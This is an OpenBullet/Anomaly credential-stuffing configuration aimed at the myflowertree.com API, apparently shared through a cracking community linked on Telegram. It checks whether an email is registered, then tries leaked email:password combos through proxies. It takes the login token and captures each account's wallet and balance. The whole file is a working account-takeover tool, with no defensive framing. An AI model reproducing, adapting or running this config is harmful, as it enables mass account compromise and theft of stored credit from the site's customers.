[SETTINGS]
{
  "Name": "myflowertree",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-03-16T20:18:23.4399157+02:00",
  "AdditionalInfo": "https://t.me/crackforce",
  "Author": "@CONFIG_COMBO",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#CHECK REQUEST GET "https://api.myflowertree.com/api/check_customer?email=<USER>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{}" 
  KEYCHAIN Success OR 
    KEY "email" 
    KEY "telephone" 

REQUEST POST "https://api.myflowertree.com/api/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"direct_login\":1}" 
  CONTENTTYPE "application/json" 
  HEADER "origin: https://www.myflowertree.com" 
  HEADER "referer: https://www.myflowertree.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "No match for E-Mail Address and/or Password" 
  KEYCHAIN Success OR 
    KEY "token" 

PARSE "<SOURCE>" JSON "token" -> VAR "Tk" 

REQUEST GET "https://api.myflowertree.com/api/wallet" 
  
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "authorization: <Tk>" 
  HEADER "origin: https://www.myflowertree.com" 
  HEADER "referer: https://www.myflowertree.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36" 

#wallet PARSE "<SOURCE>" JSON "wallet" CreateEmpty=FALSE -> CAP "wallet" 

#balance PARSE "<SOURCE>" JSON "balance" CreateEmpty=FALSE -> CAP "balance" 

FUNCTION Constant "@CONFIG_COMBO" -> CAP "Config By" 

